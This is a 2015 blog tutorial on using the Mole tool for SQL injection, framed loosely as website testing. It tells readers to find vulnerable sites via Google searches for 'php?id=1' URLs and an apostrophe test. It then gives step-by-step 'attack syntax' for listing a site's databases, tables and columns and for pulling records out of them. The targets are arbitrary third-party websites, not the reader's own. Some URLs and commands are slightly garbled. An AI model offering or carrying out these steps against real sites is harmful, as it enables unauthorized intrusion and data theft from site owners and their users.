Skip to content

SQL Injection – How to hack a websites SQL tables using the Mole

30/12/2015

To test websites are safe from SQL injection we can use SQLMAP or Mole.  Here we show the syntax to use The Mole for SQL injection testing.

 

Step 1 – Download Python 3 for Windows or Kali Linux

https://www.python.org/downloads/windows

Step 2 – Download the Mole

http://sourceforge.net/projects/themole/?source=typ_redirect

Step 3 – Install and launch the Mole

Install to C:\mole

cd themole-0.3-win32

dir    – check that you can see mole.exe.

mole

mole launch

To type in syntax, go to step 5.

Step 4 – Find a vulnerable website

Use Google.  Search for the term

php?=id1

Browse to the website and then put a single dash at the end of the url.

so it reads php?=id1′

If you get an error the website is vulnerable.

php?id=1

Using the sites returned by google, check each site by put an apostrophe after the 1, if an error appears, then the site is vulnerable.

*****

Step 5 – Attack Syntax to get the Website Databases

mole needle

url http://www.website.com.php?id=1

needle xxxx

(xxx =use a word found on the page).

schemas

Caution regarding Needle.  If you use a term not found on the page, you’ll get an error.  Here we used the term “home” eg needle home

mole error

Now you’ll see the databases on the site appear.  Write down the name of the databases, as we’ll use these where dbname appears in our syntax.

mole databases

So we can use information_schema where dbname is needed.

*****

Step 6 – Attack Syntax to get the Tables

tables Dbname

for example

tables information_schema

mole tables

The table information_schema shows us that it has 40 rows of data, and further tables.

****

Step 7 – Attack Syntax to get the Column

columns dbname tablename

for example

columns information_schema tableabc

****

Step 8 – Attack Syntax to get the records from the tables

query dbname tablename colm1,colm2.colm3

****

For testing websites, would I recommend Mole or SQLMAP?  For ease of use it has to be SQLMAP.

****

SQLMAP – How to hack a Website’s SQL tables on Windows

https://uwnthesis.wordpress.com/2015/12/29/sqlmap-how-to-hack-a-websites-sql-tables-on-windows/

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: